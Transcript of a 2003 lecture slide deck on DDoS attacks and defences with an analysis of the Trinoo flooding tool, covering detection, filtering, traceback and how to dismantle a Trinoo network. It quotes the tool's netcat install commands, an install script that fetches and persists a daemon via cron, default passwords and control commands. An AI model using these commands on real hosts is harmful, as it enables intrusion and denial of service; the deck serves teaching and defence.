An Introduction to DDoS And the “Trinoo” Attack Tool Prepared by Ray Lam, Ivan Wong July 10,...
-
date post
20-Dec-2015 -
Category
Documents
-
view
214 -
download
0
Transcript of An Introduction to DDoS And the “Trinoo” Attack Tool Prepared by Ray Lam, Ivan Wong July 10,...
An Introduction to DDoS
And the “Trinoo” Attack Tool
Prepared by Ray Lam, Ivan Wong
July 10, 2003
Outline
Background on DDoS Attack mechanism Ways to defend
The attack tool – Trinoo Introduction Attack scenario Symptoms and defense Weaknesses and next evolution
Background on DDoS
Attack mechanism
Denial-Of-Service
Flooding-based Send packets to victims
Network resources System resources
Traditional DOS One attacker
Distributed DOS Countless attackers
Attack Mechanism
Direct Attack
Reflector Attack
R
A
V
TCP SYN, ICMP, UDP With R’s Address as source IP address.
TCP SYN-ACK, TCP RST, ICMP, UDP..
TCP SYN-ACK, TCP RST, ICMP, UDP..
R
V
ATCP SYN, ICMP, UDP.. With V’s Address as source IP address.
Attack Architecture
V
A
Masters (handlers)
Agents (Daemons or Zombies)
TCP SYN, ICMP, UDP.. (the source IP addresses are usually spoofed)
Direct Attack
A
Masters (handlers)
Agents (Daemons or Zombies)
Reflectors
VReflector Attack
TCP SYN, ICMP, UDP.. (with V’s address as the source IP addresses)
TCP SYN-ACK, TCP RST, ICMP, UDP..
Attack Methods
Attack packets Reply packets
Smurf ICMP echo queries to broadcast address
ICMP echo replies
SYN flooding TCP SYN packets TCP SYN ACK packets
RST flooding TCP packets to closed ports TCP RST packets
ICMP flooding
ICMP queriesUDP packets to closed portsIP packets with low TTL
ICMP repliesPort unreachableTime exceeded
DNS reply flooding
DNS queries (recursive) to DNS servers
DNS replies
BackScatter Analysis (Moore et al.)
Measured DOS activity on the Internet. TCP (94+ %) UDP (2 %) ICMP (2 %)
TCP attacks based mainly on SYN flooding
Background on DDoS
Ways to defend
Strategy
Three lines of defense: Attack prevention
- before the attack Attack detection and filtering
- during the attack Attack source traceback
- during and after the attack
Attack prevention
Protect hosts from installation of masters and agents by attackers
Scan hosts for symptoms of agents being installed
Monitor network traffic for known message exchanges among attackers, masters, agents
Attack prevention
Inadequate and hard to deploy Don’t-care users leave security holes ISP and enterprise networks do not
have incentives
Attack source traceback
Identify actual origin of packet Without relying on source IP of packet 2 approaches
Routers record info of packets Routers send additional info of packets to
destination
Attack source traceback
Source traceback cannot stop ongoing DDoS attack Cannot trace origins behind firewalls,
NAT (network address translators) More to do for reflector attack (attack
packets from legitimate sources) Useful in post-attack law enforcement
Attack detection and filtering
Detection Identify DDoS attack and attack packets
Filtering Classify normal and attack packets Drop attack packets
Attack detection and filtering
Can be done in 4 places Victim’s network Victim’s ISP network Further upstream ISP network Attack source networks
Dispersed agents send packets to single victim
Like pouring packets from top of funnel
Attack detection and filtering
Victim
Attack sourcenetworks
Further upstreamISP networks
Victim’s ISP network
Victim’s network
Effectiveness of filtering
increases
Effectiveness of detection
increases
Attack detection and filtering
Detection Easy at victim’s network – large amount of
attack packets Difficult at individual agent’s network – small
amount of attack packets Filtering
Effective at agents’ networks – less likely to drop normal packets
Ineffective at victim’s network – more normal packets are dropped
D&F at agent’s network
Usually cannot detect DDoS attack Can filter attack packets with address
spoofed Attack packets in direct attacks Attack packets from agents to reflectors
in reflector attacks Ensuring all ISPs to install ingress
packet filtering is impossible
D&F at victim’s network
Detect DDoS attack Unusually high volume of incoming traffic of
certain packet types Degraded server and network performance
Filtering is ineffective Attack and normal packets have same
destination – victim’s IP and port Attack packets have source IP spoofed or come
from many different IPs Attack and normal packets indistinguishable
D&F at victim’s upstream ISP
Often requested by victim to filter attack packets
Alert protocol Victim cannot receive ACK from ISP Requires strong authentication and
encryption Filtering ineffective ISP network may also be jammed
D&F at further upstream ISP
Backpressure approach Victim detects DDoS attack Upstream ISPs filter attack packets
The attack tool – Trinoo
Introduction
Introduction
Discovered in August 1999 Daemons found on Solaris 2.x
systems Attack a system in University of
Minnesota Victim unusable for 2 days
Attack type
UDP flooding Default size of UDP packet: 1000
bytes malloc() buffer of this size and send
uninitialized content Default period of attack: 120 seconds Destination port: randomly chosen
from 0 – 65534
The attack tool – Trinoo
Attack scenario
Installation
1. Hack an account Acts as repository
Scanning tools, attack tools, Trinoo daemons, Trinoo maters, etc.
Requirements High bandwidth connection Large number of users Little administrative oversight
Installation
2. Compromise systems Look for vulnerable systems
Unpatched Sun Solaris and Linux Remote buffer overflow exploitation
Set up root account Open TCP ports
Keep a `friend list`
Installation
3. Install daemons Use “netcat” (“nc”) and “trin.sh”
netcat Network version of “cat”
trin.sh Shell script to set up daemons
./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
Installation
trin.sh
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"echo "crontab cron"echo "echo launched"echo "exit"
Architecture
Victim
Attacker
Masters (handlers)
Agents (Daemons or Zombies)
Direct Attack
Communication ports
Monitor specific ports to detect presence of master, agent
Attacker Master Daemon
Port 27665
TCPUDP
UDP Port 27444
Port 31335
Password protection
Password used to prevent administrators or other hackers to take control
Encrypted password compiled into master and daemon using crypt()
Clear-text password is sent over network – session is not encrypted
Received password is encrypted and compared
Password protection
Default passwords “l44adsl” – trinoo daemon password “gOrave” – trinoo master server startup “betaalmostdone” – trinoo master remote
interface password “killme” – trinoo master password to
control “mdie” command
Login to master
Telnet to port 27665 of the host with master Enter password “betaalmostdone” Warn if others try to connect the master
[root@r2 root]# telnet r1 27665Trying 192.168.249.201...Connected to r1.router (192.168.249.201).Escape character is '^]'.betaalmostdonetrinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
trinoo>
Master and daemon
Communicate by UDP packets Command line format
arg1 password arg2 Default password is “l44adsl” When daemon starts, it sends
“HELLO” to master Master maintains list of daemon
Master commands
dos IP DoS the IP address specified “aaa l44adsl IP” sent to each daemon
mdos <ip1:ip2:ip3> DoS the IPs simultaneously
mtimer N Set attack period to N seconds
Master commands
bcast List all daemons’ IP
mdie password Shutdown all daemons
killdead Invite all daemons to send “HELLO” to
master Delete all dead daemons from the list
Daemon commands
Not directly used; only used by master to send commands to daemons
Consist of 3 letters Avoid exposing the commands by using
Unix command “strings” on the binary
Daemon commands
aaa password IP DoS specified IP
bbb password N Set attack period to N seconds
rsz password N Set attack packet size to N bytes
The attack tool – Trinoo
Symptoms and defense
Symptoms
Masters Crontab
Friend list … …-b
* * * * * /usr/sbin/rpc.listen
# ls -l ... ...-b -rw------- 1 root root 25 Sep 26 14:46 ... -rw------- 1 root root 50 Sep 26 14:30 ...-b
Symptoms
Masters (Con’t) Socket status
# netstat -a --inetActive Internet connections (servers and established)Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:27665 *:* LISTEN . . .udp 0 0 *:31335 *:* . . .
Symptoms
Masters (Con’t) File status
# lsof | egrep ":31335|:27665"master 1292 root 3u inet 2460 UDP *:31335 master 1292 root 4u inet 2461 TCP *:27665 (LISTEN)
# lsof -p 1292COMMAND PID USER FD TYPE DEVICE SIZE NODE NAMEmaster 1292 root cwd DIR 3,1 1024 14356 /tmp/...master 1292 root rtd DIR 3,1 1024 2 /master 1292 root txt REG 3,1 30492 14357 /tmp/.../mastermaster 1292 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.somaster 1292 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so
Symptoms
Daemons Socket status
# netstat -a --inetActive Internet connections (servers and established)Proto Recv-Q Send-Q Local Address Foreign Address State . . .udp 0 0 *:1024 *:* udp 0 0 *:27444 *:* . . .
Symptoms
Daemons (Con’t) File status
# lsof | egrep ":27444"ns 1316 root 3u inet 2502 UDP *:27444
# lsof -p 1316COMMAND PID USER FD TYPE DEVICE SIZE NODE NAMEns 1316 root cwd DIR 3,1 1024 153694 /tmp/...ns 1316 root rtd DIR 3,1 1024 2 /ns 1316 root txt REG 3,1 6156 153711 /tmp/.../nsns 1316 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.sons 1316 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.sons 1316 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.so
Defenses
Prevent root level compromise Patch systems Set up firewalls Monitor traffics
Block abused ports High numbered UDP ports Trade off
Also block normal programs using the same ports
The attack tool – Trinoo
Weaknesses and next evolution
Weaknesses
Single kind of attack UDP flooding Easily defended by single defense tools
Use IP as destination address “Moving target defense” – victim changes
IP to avoid attack
Weaknesses
Password, encrypted password, commands visible in binary images Use Unix command “strings” to obtain
- strings master- strings –n3 ns
Check if Trinoo found Crack the encrypted passwords
Weaknesses
Password travels in plain text in network Daemon password frequently sent in
master-to-daemon commands Get password by “ngrep”, “tcpdump”
which show UDP payload
Uproot a Trinoo network
Locate a daemon Use “strings” to obtain IPs of masters Contact sites with master installed Those sites check list of daemons
By inspecting file “…” or get master login password and use “bcast” command
Get “mdie” password Use “mdie” to shut down all daemons “mdie” periodically as daemons restarted by
crontab
Next evolution
Combination of several attack types SYN flood, UDP flood, ICMP flood… Higher chance of successful attack
Stronger encryption of embedded strings, passwords
Use encrypted communication channel Communicate by protocol difficult to be
detected or blocked, e.g. ICMP
References
R. Chang, “Defending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial,” Oct. 2002
D. Dittrich, “The DoS Project’s ‘Trinoo’ Distributed Denial of Service Attack Tool,” http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt, Oct. 1999
Open Discussion